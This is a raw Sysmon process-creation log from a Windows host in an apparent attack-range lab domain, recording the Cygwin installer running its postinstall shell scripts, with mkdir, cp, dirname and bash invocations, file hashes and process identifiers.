14:56:00.880{A8622C2F-5400-6078-BA0B-00000000AE01}2408C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-B90B-00000000AE01}5776C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055955Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.871{A8622C2F-5400-6078-B90B-00000000AE01}5776C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.833{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000055928Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.818{A8622C2F-5400-6078-B60B-00000000AE01}5212C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-B50B-00000000AE01}5516C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055918Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.810{A8622C2F-5400-6078-B50B-00000000AE01}5516C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B10B-00000000AE01}5800C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.802{A8622C2F-5400-6078-B40B-00000000AE01}5108C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-B30B-00000000AE01}5620C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.794{A8622C2F-5400-6078-B30B-00000000AE01}5620C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B10B-00000000AE01}5800C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055881Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.754{A8622C2F-5400-6078-B10B-00000000AE01}5800C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000055869Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.734{A8622C2F-5400-6078-B00B-00000000AE01}2664C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-AF0B-00000000AE01}5828C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.726{A8622C2F-5400-6078-AF0B-00000000AE01}5828C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.718{A8622C2F-5400-6078-AE0B-00000000AE01}2084C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-AD0B-00000000AE01}1736C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.710{A8622C2F-5400-6078-AD0B-00000000AE01}1736C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.702{A8622C2F-5400-6078-AC0B-00000000AE01}6748C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-AB0B-00000000AE01}6416C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055817Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.694{A8622C2F-5400-6078-AB0B-00000000AE01}6416C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055804Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.685{A8622C2F-5400-6078-AA0B-00000000AE01}3200C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-A90B-00000000AE01}1612C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.677{A8622C2F-5400-6078-A90B-00000000AE01}1612C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.669{A8622C2F-5400-6078-A80B-00000000AE01}3208C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-A70B-00000000AE01}2408C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.661{A8622C2F-5400-6078-A70B-00000000AE01}2408C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055762Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.654{A8622C2F-5400-6078-A60B-00000000AE01}6552C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-A50B-00000000AE01}6808C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.646{A8622C2F-5400-6078-A50B-00000000AE01}6808C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055739Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.637{A8622C2F-5400-6078-A40B-00000000AE01}4268C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-A30B-00000000AE01}5052C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.629{A8622C2F-5400-6078-A30B-00000000AE01}5052C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055717Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.621{A8622C2F-5400-6078-A20B-00000000AE01}5516C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-A10B-00000000AE01}1476C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055707Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.613{A8622C2F-5400-6078-A10B-00000000AE01}1476C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.606{A8622C2F-5400-6078-A00B-00000000AE01}6440C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-9F0B-00000000AE01}6852C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.598{A8622C2F-5400-6078-9F0B-00000000AE01}6852C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055673Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.588{A8622C2F-5400-6078-9E0B-00000000AE01}7140C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-9D0B-00000000AE01}3156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.580{A8622C2F-5400-6078-9D0B-00000000AE01}3156C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.572{A8622C2F-5400-6078-9C0B-00000000AE01}5996C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-9B0B-00000000AE01}6332C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055642Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.564{A8622C2F-5400-6078-9B0B-00000000AE01}6332C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.557{A8622C2F-5400-6078-9A0B-00000000AE01}5744C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-990B-00000000AE01}5312C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055621Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.548{A8622C2F-5400-6078-990B-00000000AE01}5312C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.539{A8622C2F-5400-6078-980B-00000000AE01}5804C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-970B-00000000AE01}5664C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055598Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.531{A8622C2F-5400-6078-970B-00000000AE01}5664C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.523{A8622C2F-5400-6078-960B-00000000AE01}6700C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-950B-00000000AE01}924C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055577Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.516{A8622C2F-5400-6078-950B-00000000AE01}924C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.508{A8622C2F-5400-6078-940B-00000000AE01}3008C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-930B-00000000AE01}5344C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055556Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.500{A8622C2F-5400-6078-930B-00000000AE01}5344C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 